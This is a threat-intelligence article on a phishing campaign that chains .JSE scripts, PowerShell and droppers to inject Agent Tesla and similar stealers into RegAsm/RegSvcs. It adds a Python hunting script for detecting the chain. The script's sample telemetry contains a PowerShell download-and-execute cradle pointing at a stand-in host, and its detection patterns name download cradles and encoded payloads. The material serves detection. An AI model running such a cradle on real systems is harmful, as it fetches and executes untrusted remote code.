A multi-stage malware campaign has been identified that chains JScript Encoded (.JSE) files and PowerShell scripts to deliver commodity malware families including Agent Tesla, Remcos RAT, and XLoader. The campaign shows how attackers stack several simple delivery stages to evade detection and make sure the final payload executes.
Initial Attack Vector: Phishing Emails
The attack starts with a phishing email posing as an order request. The emails, observed in December 2024, falsely claim that a payment has been made and urge the recipient to review an attached order file. The attachment is a 7-Zip archive containing a malicious .JSE file. When the recipient opens it, the Windows Script Host runs the script, which begins the infection sequence by downloading a PowerShell script from an external server.
Execution of PowerShell Script
The downloaded PowerShell script carries a Base64-encoded payload. The script decodes it, writes it to the Windows temporary directory, and executes it. That payload is a next-stage dropper built either as a .NET executable or as a compiled AutoIt script; having two parallel execution paths makes the chain more resilient and forces defenders to analyse both variants.
Deployment of Final Payloads
When the dropper is a .NET executable, the embedded payload, identified as Agent Tesla or a related stealer such as Snake Keylogger or XLoader, is decrypted and injected into a running RegAsm.exe process (the .NET Assembly Registration Tool). This matches the injection technique seen in earlier Agent Tesla campaigns.
When the dropper is compiled with AutoIt, an extra layer is added to hinder analysis. The AutoIt script contains an encrypted payload that loads the final shellcode, which in turn injects a .NET file into a RegSvcs.exe process (the .NET Services Installation Tool), again ending in the deployment of Agent Tesla.
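Every stage of the chain described above leaves a distinctive process-creation event: a script host running a .jse file, PowerShell spawned by that script host with a download cradle, an executable launched from the temp directory, and RegAsm.exe or RegSvcs.exe started by something other than a build tool. The following hunting script is an added example (not code from the original article or from the researchers who reported the campaign) that checks those signals over Sysmon-style process-creation records. The record field names (image, command_line, parent_image, host) and the sample events are constructed for illustration and are assumptions, not real telemetry from this campaign.

```python
"""Hunt for the JSE -> PowerShell -> dropper -> RegAsm/RegSvcs chain in process telemetry.

Added example. Assumes Sysmon Event ID 1 style records normalised to dicts with
the keys host, image, command_line and parent_image (field names are an assumption).
"""
import re
from collections import defaultdict

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
INJECTION_HOSTS = ("regasm.exe", "regsvcs.exe")
# Parents that legitimately launch RegAsm/RegSvcs in most environments (assumption: tune per estate).
EXPECTED_REGASM_PARENTS = ("msbuild.exe", "devenv.exe", "msiexec.exe", "dotnet.exe")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _args_after_image(cmd):
    """Return the arguments following the (possibly quoted) executable in a command line."""
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[end + 1:].strip() if end != -1 else ""
    parts = cmd.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def classify(ev):
    """Return the list of chain stages a single process-creation event matches (empty if benign)."""
    image = basename(ev["image"])
    parent = basename(ev["parent_image"])
    cmd = ev["command_line"].lower()
    hits = []

    # Stage 1: wscript/cscript executing a .jse, typically from an extracted archive in %TEMP%.
    if image in SCRIPT_HOSTS and re.search(r"\.jse\b", cmd):
        hits.append("jse_execution")

    # Stage 2: PowerShell spawned by a script host, carrying a download cradle or a Base64 blob.
    if image in POWERSHELL:
        if parent in SCRIPT_HOSTS:
            hits.append("powershell_from_script_host")
        if re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", cmd):
            hits.append("powershell_download_cradle")
        if re.search(r"-e(nc(odedcommand)?)?\s+[a-z0-9+/=]{20,}", cmd) or "frombase64string" in cmd:
            hits.append("powershell_encoded_payload")

    # Stage 3: the decoded dropper launched by PowerShell from the temp directory.
    if parent in POWERSHELL and re.search(r"\\(temp|tmp)\\", ev["image"].lower()):
        hits.append("dropper_from_temp")

    # Stage 4: RegAsm/RegSvcs started by an unexpected parent or with no arguments (injection target).
    if image in INJECTION_HOSTS:
        if parent not in EXPECTED_REGASM_PARENTS or not _args_after_image(cmd):
            hits.append("suspicious_regasm_regsvcs")

    return hits


def hunt(events, min_stages=2):
    """Group stage hits per host; a host showing min_stages distinct stages is a likely chain."""
    per_host = defaultdict(set)
    for ev in events:
        for stage in classify(ev):
            per_host[ev["host"]].add(stage)
    return {h: sorted(s) for h, s in per_host.items() if len(s) >= min_stages}


# Constructed sample telemetry: one infected workstation plus two benign hosts.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'"C:\Windows\System32\WScript.exe" "C:\Users\alice\AppData\Local\Temp\7zO4A1\Order_Details.jse"',
     "parent_image": r"C:\Program Files\7-Zip\7zFM.exe"},
    {"host": "WS01", "image": PS,
     "command_line": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\"",
     "parent_image": r"C:\Windows\System32\wscript.exe"},
    {"host": "WS01", "image": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "command_line": r'"C:\Users\alice\AppData\Local\Temp\svc.exe"', "parent_image": PS},
    {"host": "WS01", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "command_line": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"',
     "parent_image": r"C:\Users\alice\AppData\Local\Temp\svc.exe"},
    # Benign: build server registering an assembly the normal way.
    {"host": "BUILD01", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe",
     "command_line": r"RegAsm.exe /codebase C:\build\out\Interop.dll",
     "parent_image": r"C:\Program Files\Microsoft Visual Studio\2022\MSBuild\Current\Bin\MSBuild.exe"},
    # Benign: admin running a local script from Explorer.
    {"host": "WS02", "image": PS, "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1",
     "parent_image": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for host, stages in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

Requiring at least two distinct stages on the same host keeps a lone RegAsm.exe launch on a developer box or a single download cradle from paging anyone, while the full chain on WS01 lights up every stage. The RegAsm/RegSvcs rule is the one to tune first: whitelist the parent processes that legitimately register assemblies in your environment rather than loosening the "no arguments" check, since the injected copy in this campaign is started as a bare process.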
Implications and Recommendations
By stacking simple stages (a script attachment, a PowerShell downloader, a dropper in two flavours, and process injection into a trusted .NET utility), the attackers build a chain that is resilient to the failure of any one stage and costly to analyse in full. Beyond the usual advice of strong email filtering, regular security awareness training, and up-to-date endpoint protection, organisations should quarantine script-type attachments such as .JSE files and archives that contain them, restrict Windows Script Host where it is not needed, and alert on RegAsm.exe or RegSvcs.exe being launched by anything other than a build or installer process.